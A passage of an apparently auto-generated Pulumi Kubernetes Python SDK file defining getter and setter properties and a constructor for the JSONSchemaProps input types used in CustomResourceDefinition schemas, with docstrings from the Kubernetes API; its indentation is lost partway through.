        pulumi.set(self, "additional_properties", value)
    @property
    @pulumi.getter(name="allOf")
    def all_of(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]]:
        return pulumi.get(self, "all_of")
    @all_of.setter
    def all_of(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]]):
        pulumi.set(self, "all_of", value)
    @property
    @pulumi.getter(name="anyOf")
    def any_of(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]]:
        return pulumi.get(self, "any_of")
    @any_of.setter
    def any_of(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]]):
        pulumi.set(self, "any_of", value)
    @property
    @pulumi.getter
    def default(self) -> Optional[Any]:
        """
        default is a default value for undefined object fields. Defaulting is a beta feature under the CustomResourceDefaulting feature gate. Defaulting requires spec.preserveUnknownFields to be false.
        """
        return pulumi.get(self, "default")
    @default.setter
    def default(self, value: Optional[Any]):
        pulumi.set(self, "default", value)
    @property
    @pulumi.getter
    def definitions(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]:
        return pulumi.get(self, "definitions")
    @definitions.setter
    def definitions(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]):
        pulumi.set(self, "definitions", value)
    @property
    @pulumi.getter
    def dependencies(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[pulumi.Input[str]]]]]]]:
        return pulumi.get(self, "dependencies")
    @dependencies.setter
    def dependencies(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[pulumi.Input[str]]]]]]]):
        pulumi.set(self, "dependencies", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter
    def enum(self) -> Optional[pulumi.Input[Sequence[Any]]]:
        return pulumi.get(self, "enum")
    @enum.setter
    def enum(self, value: Optional[pulumi.Input[Sequence[Any]]]):
        pulumi.set(self, "enum", value)
    @property
    @pulumi.getter
    def example(self) -> Optional[Any]:
        return pulumi.get(self, "example")
    @example.setter
    def example(self, value: Optional[Any]):
        pulumi.set(self, "example", value)
    @property
    @pulumi.getter(name="exclusiveMaximum")
    def exclusive_maximum(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "exclusive_maximum")
    @exclusive_maximum.setter
    def exclusive_maximum(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "exclusive_maximum", value)
    @property
    @pulumi.getter(name="exclusiveMinimum")
    def exclusive_minimum(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "exclusive_minimum")
    @exclusive_minimum.setter
    def exclusive_minimum(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "exclusive_minimum", value)
    @property
    @pulumi.getter(name="externalDocs")
    def external_docs(self) -> Optional[pulumi.Input['ExternalDocumentationPatchArgs']]:
        return pulumi.get(self, "external_docs")
    @external_docs.setter
    def external_docs(self, value: Optional[pulumi.Input['ExternalDocumentationPatchArgs']]):
        pulumi.set(self, "external_docs", value)
    @property
    @pulumi.getter
    def format(self) -> Optional[pulumi.Input[str]]:
        """
        format is an OpenAPI v3 format string. Unknown formats are ignored. The following formats are validated:
        - bsonobjectid: a bson object ID, i.e. a 24 characters hex string - uri: an URI as parsed by Golang net/url.ParseRequestURI - email: an email address as parsed by Golang net/mail.ParseAddress - hostname: a valid representation for an Internet host name, as defined by RFC 1034, section 3.1 [RFC1034]. - ipv4: an IPv4 IP as parsed by Golang net.ParseIP - ipv6: an IPv6 IP as parsed by Golang net.ParseIP - cidr: a CIDR as parsed by Golang net.ParseCIDR - mac: a MAC address as parsed by Golang net.ParseMAC - uuid: an UUID that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid3: an UUID3 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?3[0-9a-f]{3}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid4: an UUID4 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?4[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - uuid5: an UUID5 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?5[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - isbn: an ISBN10 or ISBN13 number string like "0321751043" or "978-0321751041" - isbn10: an ISBN10 number string like "0321751043" - isbn13: an ISBN13 number string like "978-0321751041" - creditcard: a credit card number defined by the regex ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\\d{11})$ with any non digit characters mixed in - ssn: a U.S. 
        social security number following the regex ^\\d{3}[- ]?\\d{2}[- ]?\\d{4}$ - hexcolor: an hexadecimal color code like "#FFFFFF: following the regex ^#?([0-9a-fA-F]{3}|[0-9a-fA-F]{6})$ - rgbcolor: an RGB color code like rgb like "rgb(255,255,2559" - byte: base64 encoded binary data - password: any kind of string - date: a date string like "2006-01-02" as defined by full-date in RFC3339 - duration: a duration string like "22 ns" as parsed by Golang time.ParseDuration or compatible with Scala duration format - datetime: a date time string like "2014-12-15T19:30:20.000Z" as defined by date-time in RFC3339.
        """
        return pulumi.get(self, "format")
    @format.setter
    def format(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "format", value)
    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "id")
    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)
    @property
    @pulumi.getter
    def items(self) -> Optional[pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[Any]]]]:
        return pulumi.get(self, "items")
    @items.setter
    def items(self, value: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[Any]]]]):
        pulumi.set(self, "items", value)
    @property
    @pulumi.getter(name="maxItems")
    def max_items(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "max_items")
    @max_items.setter
    def max_items(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_items", value)
    @property
    @pulumi.getter(name="maxLength")
    def max_length(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "max_length")
    @max_length.setter
    def max_length(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_length", value)
    @property
    @pulumi.getter(name="maxProperties")
    def max_properties(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "max_properties")
    @max_properties.setter
    def max_properties(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_properties", value)
    @property
    @pulumi.getter
    def maximum(self) -> Optional[pulumi.Input[float]]:
        return pulumi.get(self, "maximum")
    @maximum.setter
    def maximum(self, value: Optional[pulumi.Input[float]]):
        pulumi.set(self, "maximum", value)
    @property
    @pulumi.getter(name="minItems")
    def min_items(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "min_items")
    @min_items.setter
    def min_items(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_items", value)
    @property
    @pulumi.getter(name="minLength")
    def min_length(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "min_length")
    @min_length.setter
    def min_length(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_length", value)
    @property
    @pulumi.getter(name="minProperties")
    def min_properties(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "min_properties")
    @min_properties.setter
    def min_properties(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_properties", value)
    @property
    @pulumi.getter
    def minimum(self) -> Optional[pulumi.Input[float]]:
        return pulumi.get(self, "minimum")
    @minimum.setter
    def minimum(self, value: Optional[pulumi.Input[float]]):
        pulumi.set(self, "minimum", value)
    @property
    @pulumi.getter(name="multipleOf")
    def multiple_of(self) -> Optional[pulumi.Input[float]]:
        return pulumi.get(self, "multiple_of")
    @multiple_of.setter
    def multiple_of(self, value: Optional[pulumi.Input[float]]):
        pulumi.set(self, "multiple_of", value)
    # Serialized as "not"; the trailing underscore avoids the Python keyword.
    @property
    @pulumi.getter(name="not")
    def not_(self) -> Optional[pulumi.Input['JSONSchemaPropsPatchArgs']]:
        return pulumi.get(self, "not_")
    @not_.setter
    def not_(self, value: Optional[pulumi.Input['JSONSchemaPropsPatchArgs']]):
        pulumi.set(self, "not_", value)
    @property
    @pulumi.getter
    def nullable(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "nullable")
    @nullable.setter
    def nullable(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "nullable", value)
    @property
    @pulumi.getter(name="oneOf")
    def one_of(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]]:
        return pulumi.get(self, "one_of")
    @one_of.setter
    def one_of(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]]):
        pulumi.set(self, "one_of", value)
    @property
    @pulumi.getter
    def pattern(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "pattern")
    @pattern.setter
    def pattern(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "pattern", value)
    @property
    @pulumi.getter(name="patternProperties")
    def pattern_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]:
        return pulumi.get(self, "pattern_properties")
    @pattern_properties.setter
    def pattern_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]):
        pulumi.set(self, "pattern_properties", value)
    @property
    @pulumi.getter
    def properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]:
        return pulumi.get(self, "properties")
    @properties.setter
    def properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]):
        pulumi.set(self, "properties", value)
    @property
    @pulumi.getter
    def required(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        return pulumi.get(self, "required")
    @required.setter
    def required(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "required", value)
    @property
    @pulumi.getter
    def title(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "title")
    @title.setter
    def title(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "title", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@property
@pulumi.getter(name="uniqueItems")
def unique_items(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "unique_items")
@unique_items.setter
def unique_items(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "unique_items", value)
@property
@pulumi.getter
def x_kubernetes_embedded_resource(self) -> Optional[pulumi.Input[bool]]:
"""
x-kubernetes-embedded-resource defines that the value is an embedded Kubernetes runtime.Object, with TypeMeta and ObjectMeta. The type must be object. It is allowed to further restrict the embedded object. kind, apiVersion and metadata are validated automatically. x-kubernetes-preserve-unknown-fields is allowed to be true, but does not have to be if the object is fully specified (up to kind, apiVersion, metadata).
"""
return pulumi.get(self, "x_kubernetes_embedded_resource")
@x_kubernetes_embedded_resource.setter
def x_kubernetes_embedded_resource(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "x_kubernetes_embedded_resource", value)
@property
@pulumi.getter
def x_kubernetes_int_or_string(self) -> Optional[pulumi.Input[bool]]:
"""
x-kubernetes-int-or-string specifies that this value is either an integer or a string. If this is true, an empty type is allowed and type as child of anyOf is permitted if following one of the following patterns:
1) anyOf:
- type: integer
- type: string
2) allOf:
- anyOf:
- type: integer
- type: string
- ... zero or more
"""
return pulumi.get(self, "x_kubernetes_int_or_string")
@x_kubernetes_int_or_string.setter
def x_kubernetes_int_or_string(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "x_kubernetes_int_or_string", value)
@property
@pulumi.getter
def x_kubernetes_list_map_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
x-kubernetes-list-map-keys annotates an array with the x-kubernetes-list-type `map` by specifying the keys used as the index of the map.
This tag MUST only be used on lists that have the "x-kubernetes-list-type" extension set to "map". Also, the values specified for this attribute must be a scalar typed field of the child structure (no nesting is supported).
The properties specified must either be required or have a default value, to ensure those properties are present for all list items.
"""
return pulumi.get(self, "x_kubernetes_list_map_keys")
@x_kubernetes_list_map_keys.setter
def x_kubernetes_list_map_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "x_kubernetes_list_map_keys", value)
@property
@pulumi.getter
def x_kubernetes_list_type(self) -> Optional[pulumi.Input[str]]:
"""
x-kubernetes-list-type annotates an array to further describe its topology. This extension must only be used on lists and may have 3 possible values:
1) `atomic`: the list is treated as a single entity, like a scalar.
Atomic lists will be entirely replaced when updated. This extension
may be used on any type of list (struct, scalar, ...).
2) `set`:
Sets are lists that must not have multiple items with the same value. Each
value must be a scalar, an object with x-kubernetes-map-type `atomic` or an
array with x-kubernetes-list-type `atomic`.
3) `map`:
These lists are like maps in that their elements have a non-index key
used to identify them. Order is preserved upon merge. The map tag
must only be used on a list with elements of type object.
Defaults to atomic for arrays.
"""
return pulumi.get(self, "x_kubernetes_list_type")
@x_kubernetes_list_type.setter
def x_kubernetes_list_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "x_kubernetes_list_type", value)
@property
@pulumi.getter
def x_kubernetes_map_type(self) -> Optional[pulumi.Input[str]]:
"""
x-kubernetes-map-type annotates an object to further describe its topology. This extension must only be used when type is object and may have 2 possible values:
1) `granular`:
These maps are actual maps (key-value pairs) and each fields are independent
from each other (they can each be manipulated by separate actors). This is
the default behaviour for all maps.
2) `atomic`: the list is treated as a single entity, like a scalar.
Atomic maps will be entirely replaced when updated.
"""
return pulumi.get(self, "x_kubernetes_map_type")
@x_kubernetes_map_type.setter
def x_kubernetes_map_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "x_kubernetes_map_type", value)
@property
@pulumi.getter
def x_kubernetes_preserve_unknown_fields(self) -> Optional[pulumi.Input[bool]]:
"""
x-kubernetes-preserve-unknown-fields stops the API server decoding step from pruning fields which are not specified in the validation schema. This affects fields recursively, but switches back to normal pruning behaviour if nested properties or additionalProperties are specified in the schema. This can either be true or undefined. False is forbidden.
"""
return pulumi.get(self, "x_kubernetes_preserve_unknown_fields")
@x_kubernetes_preserve_unknown_fields.setter
def x_kubernetes_preserve_unknown_fields(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "x_kubernetes_preserve_unknown_fields", value)
@property
@pulumi.getter
def x_kubernetes_validations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ValidationRulePatchArgs']]]]:
"""
x-kubernetes-validations describes a list of validation rules written in the CEL expression language. This field is an alpha-level. Using this field requires the feature gate `CustomResourceValidationExpressions` to be enabled.
"""
return pulumi.get(self, "x_kubernetes_validations")
@x_kubernetes_validations.setter
def x_kubernetes_validations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ValidationRulePatchArgs']]]]):
pulumi.set(self, "x_kubernetes_validations", value)
@pulumi.input_type
class JSONSchemaPropsArgs:
def __init__(__self__, *,
_ref: Optional[pulumi.Input[str]] = None,
_schema: Optional[pulumi.Input[str]] = None,
additional_items: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]] = None,
additional_properties: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]] = None,
all_of: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]] = None,
any_of: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]] = None,
default: Optional[Any] = None,
definitions: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]] = None,
dependencies: Optional[pulumi.Input[Mapping[str, pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[pulumi.Input[str]]]]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enum: Optional[pulumi.Input[Sequence[Any]]] = None,
example: Optional[Any] = None,
exclusive_maximum: Optional[pulumi.Input[bool]] = None,
exclusive_minimum: Optional[pulumi.Input[bool]] = None,
external_docs: Optional[pulumi.Input['ExternalDocumentationArgs']] = None,
format: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
items: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[Any]]]] = None,
max_items: Optional[pulumi.Input[int]] = None,
max_length: Optional[pulumi.Input[int]] = None,
max_properties: Optional[pulumi.Input[int]] = None,
maximum: Optional[pulumi.Input[float]] = None,
min_items: Optional[pulumi.Input[int]] = None,
min_length: Optional[pulumi.Input[int]] = None,
min_properties: Optional[pulumi.Input[int]] = None,
minimum: Optional[pulumi.Input[float]] = None,
multiple_of: Optional[pulumi.Input[float]] = None,
not_: Optional[pulumi.Input['JSONSchemaPropsArgs']] = None,
nullable: Optional[pulumi.Input[bool]] = None,
one_of: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]] = None,
pattern: Optional[pulumi.Input[str]] = None,
pattern_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]] = None,
properties: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]] = None,
required: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
title: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
unique_items: Optional[pulumi.Input[bool]] = None,
x_kubernetes_embedded_resource: Optional[pulumi.Input[bool]] = None,
x_kubernetes_int_or_string: Optional[pulumi.Input[bool]] = None,
x_kubernetes_list_map_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
x_kubernetes_list_type: Optional[pulumi.Input[str]] = None,
x_kubernetes_map_type: Optional[pulumi.Input[str]] = None,
x_kubernetes_preserve_unknown_fields: Optional[pulumi.Input[bool]] = None,
x_kubernetes_validations: Optional[pulumi.Input[Sequence[pulumi.Input['ValidationRuleArgs']]]] = None):
"""
JSONSchemaProps is a JSON-Schema following Specification Draft 4 (http://json-schema.org/).
:param Any default: default is a default value for undefined object fields. Defaulting is a beta feature under the CustomResourceDefaulting feature gate. Defaulting requires spec.preserveUnknownFields to be false.
:param pulumi.Input[str] format: format is an OpenAPI v3 format string. Unknown formats are ignored. The following formats are validated:
- bsonobjectid: a bson object ID, i.e. a 24 characters hex string - uri: an URI as parsed by Golang net/url.ParseRequestURI - email: an email address as parsed by Golang net/mail.ParseAddress - hostname: a valid representation for an Internet host name, as defined by RFC 1034, section 3.1 [RFC1034]. - ipv4: an IPv4 IP as parsed by Golang net.ParseIP - ipv6: an IPv6 IP as parsed by Golang net.ParseIP - cidr: a CIDR as parsed by Golang net.ParseCIDR - mac: a MAC address as parsed by Golang net.ParseMAC - uuid: an UUID that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid3: an UUID3 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?3[0-9a-f]{3}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid4: an UUID4 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?4[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - uuid5: an UUID5 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?5[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - isbn: an ISBN10 or ISBN13 number string like "0321751043" or "978-0321751041" - isbn10: an ISBN10 number string like "0321751043" - isbn13: an ISBN13 number string like "978-0321751041" - creditcard: a credit card number defined by the regex ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\\d{11})$ with any non digit characters mixed in - ssn: a U.S. 
social security number following the regex ^\\d{3}[- ]?\\d{2}[- ]?\\d{4}$ - hexcolor: an hexadecimal color code like "#FFFFFF: following the regex ^#?([0-9a-fA-F]{3}|[0-9a-fA-F]{6})$ - rgbcolor: an RGB color code like rgb like "rgb(255,255,2559" - byte: base64 encoded binary data - password: any kind of string - date: a date string like "2006-01-02" as defined by full-date in RFC3339 - duration: a duration string like "22 ns" as parsed by Golang time.ParseDuration or compatible with Scala duration format - datetime: a date time string like "2014-12-15T19:30:20.000Z" as defined by date-time in RFC3339.
:param pulumi.Input[bool] x_kubernetes_embedded_resource: x-kubernetes-embedded-resource defines that the value is an embedded Kubernetes runtime.Object, with TypeMeta and ObjectMeta. The type must be object. It is allowed to further restrict the embedded object. kind, apiVersion and metadata are validated automatically. x-kubernetes-preserve-unknown-fields is allowed to be true, but does not have to be if the object is fully specified (up to kind, apiVersion, metadata).
:param pulumi.Input[bool] x_kubernetes_int_or_string: x-kubernetes-int-or-string specifies that this value is either an integer or a string. If this is true, an empty type is allowed and type as child of anyOf is permitted if following one of the following patterns:
1) anyOf:
- type: integer
- type: string
2) allOf:
- anyOf:
- type: integer
- type: string
- ... zero or more
:param pulumi.Input[Sequence[pulumi.Input[str]]] x_kubernetes_list_map_keys: x-kubernetes-list-map-keys annotates an array with the x-kubernetes-list-type `map` by specifying the keys used as the index of the map.
This tag MUST only be used on lists that have the "x-kubernetes-list-type" extension set to "map". Also, the values specified for this attribute must be a scalar typed field of the child structure (no nesting is supported).
The properties specified must either be required or have a default value, to ensure those properties are present for all list items.
:param pulumi.Input[str] x_kubernetes_list_type: x-kubernetes-list-type annotates an array to further describe its topology. This extension must only be used on lists and may have 3 possible values:
1) `atomic`: the list is treated as a single entity, like a scalar.
Atomic lists will be entirely replaced when updated. This extension
may be used on any type of list (struct, scalar, ...).
2) `set`:
Sets are lists that must not have multiple items with the same value. Each
value must be a scalar, an object with x-kubernetes-map-type `atomic` or an
array with x-kubernetes-list-type `atomic`.
3) `map`:
These lists are like maps in that their elements have a non-index key
used to identify them. Order is preserved upon merge. The map tag
must only be used on a list with elements of type object.
Defaults to atomic for arrays.
:param pulumi.Input[str] x_kubernetes_map_type: x-kubernetes-map-type annotates an object to further describe its topology. This extension must only be used when type is object and may have 2 possible values:
1) `granular`:
These maps are actual maps (key-value pairs) and each fields are independent
from each other (they can each be manipulated by separate actors). This is
the default behaviour for all maps.
2) `atomic`: the list is treated as a single entity, like a scalar.
Atomic maps will be entirely replaced when updated.
:param pulumi.Input[bool] x_kubernetes_preserve_unknown_fields: x-kubernetes-preserve-unknown-fields stops the API server decoding step from pruning fields which are not specified in the validation schema. This affects fields recursively, but switches back to normal pruning behaviour if nested properties or additionalProperties are specified in the schema. This can either be true or undefined. False is forbidden.
:param pulumi.Input[Sequence[pulumi.Input['ValidationRuleArgs']]] x_kubernetes_validations: x-kubernetes-validations describes a list of validation rules written in the CEL expression language. This field is an alpha-level. Using this field requires the feature gate `CustomResourceValidationExpressions` to be enabled.
"""
if _ref is not None:
pulumi.set(__self__, "_ref", _ref)
if _schema is not None:
pulumi.set(__self__, "_schema", _schema)
if additional_items is not None:
pulumi.set(__self__, "additional_items", additional_items)
if additional_properties is not None:
pulumi.set(__self__, "additional_properties", additional_properties)
if all_of is not None:
pulumi.set(__self__, "all_of", all_of)
if any_of is not None:
pulumi.set(__self__, "any_of", any_of)
if default is not None:
pulumi.set(__self__, "default", default)
if definitions is not None:
pulumi.set(__self__, "definitions", definitions)
if dependencies is not None:
pulumi.set(__self__, "dependencies", dependencies)
if description is not None:
pulumi.set(__self__, "description", description)
if enum is not None:
pulumi.set(__self__, "enum", enum)
if example is not None:
pulumi.set(__self__, "example", example)
if exclusive_maximum is not None:
pulumi.set(__self__, "exclusive_maximum", exclusive_maximum)
if exclusive_minimum is not None:
pulumi.set(__self__, "exclusive_minimum", exclusive_minimum)
if external_docs is not None:
pulumi.set(__self__, "external_docs", external_docs)
if format is not None:
pulumi.set(__self__, "format", format)
if id is not None:
pulumi.set(__self__, "id", id)
if items is not None:
pulumi.set(__self__, "items", items)
if max_items is not None:
pulumi.set(__self__, "max_items", max_items)
if max_length is not None:
pulumi.set(__self__, "max_length", max_length)
if max_properties is not None:
pulumi.set(__self__, "max_properties", max_properties)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_items is not None:
pulumi.set(__self__, "min_items", min_items)
if min_length is not None:
pulumi.set(__self__, "min_length", min_length)
if min_properties is not None:
pulumi.set(__self__, "min_properties", min_properties)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if multiple_of is not None:
pulumi.set(__self__, "multiple_of", multiple_of)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if nullable is not None:
pulumi.set(__self__, "nullable", nullable)
if one_of is not None:
pulumi.set(__self__, "one_of", one_of)
if pattern is not None:
pulumi.set(__self__, "pattern", pattern)
if pattern_properties is not None:
pulumi.set(__self__, "pattern_properties", pattern_properties)
if properties is not None:
pulumi.set(__self__, "properties", properties)
if required is not None:
pulumi.set(__self__, "required", required)
if title is not None:
pulumi.set(__self__, "title", title)
if type is not None:
pulumi.set(__self__, "type", type)
if unique_items is not None:
pulumi.set(__self__, "unique_items", unique_items)
if x_kubernetes_embedded_resource is not None:
pulumi.set(__self__, "x_kubernetes_embedded_resource", x_kubernetes_embedded_resource)
if x_kubernetes_int_or_string is not None:
pulumi.set(__self__, "x_kubernetes_int_or_string", x_kubernetes_int_or_string)
if x_kubernetes_list_map_keys is not None:
pulumi.set(__self__, "x_kubernetes_list_map_keys", x_kubernetes_list_map_keys)
if x_kubernetes_list_type is not None:
pulumi.set(__self__, "x_kubernetes_list_type", x_kubernetes_list_type)
if x_kubernetes_map_type is not None:
pulumi.set(__self__, "x_kubernetes_map_type", x_kubernetes_map_type)
if x_kubernetes_preserve_unknown_fields is not None:
pulumi.set(__self__, "x_kubernetes_preserve_unknown_fields", x_kubernetes_preserve_unknown_fields)
if x_kubernetes_validations is not None:
pulumi.set(__self__, "x_kubernetes_validations", x_kubernetes_validations)
@property
@pulumi.getter(name="$ref")
def _ref(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "_ref")
@_ref.setter
def _ref(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "_ref", value)
@property
@pulumi.getter(name="$schema")
def _schema(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "_schema")
@_schema.setter
def _schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "_schema", value)
@property
@pulumi.getter(name="additionalItems")
def additional_items(self) -> Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]:
return pulumi.get(self, "additional_items")
@additional_items.setter
def additional_items(self, value: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]):
pulumi.set(self, "additional_items", value)
@property
@pulumi.getter(name="additionalProperties")
def additional_properties(self) -> Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]:
return pulumi.get(self, "additional_properties")
@additional_properties.setter
def additional_properties(self, value: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]):
pulumi.set(self, "additional_properties", value)
@property
@pulumi.getter(name="allOf")
def all_of(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "all_of")
@all_of.setter
def all_of(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "all_of", value)
@property
@pulumi.getter(name="anyOf")
def any_of(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "any_of")
@any_of.setter
def any_of(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "any_of", value)
@property
@pulumi.getter
def default(self) -> Optional[Any]:
"""
default is a default value for undefined object fields. Defaulting is a beta feature under the CustomResourceDefaulting feature gate. Defaulting requires spec.preserveUnknownFields to be false.
"""
return pulumi.get(self, "default")
@default.setter
def default(self, value: Optional[Any]):
pulumi.set(self, "default", value)
@property
@pulumi.getter
def definitions(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "definitions")
@definitions.setter
def definitions(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "definitions", value)
@property
@pulumi.getter
def dependencies(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[pulumi.Input[str]]]]]]]:
return pulumi.get(self, "dependencies")
@dependencies.setter
def dependencies(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[pulumi.Input[str]]]]]]]):
pulumi.set(self, "dependencies", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
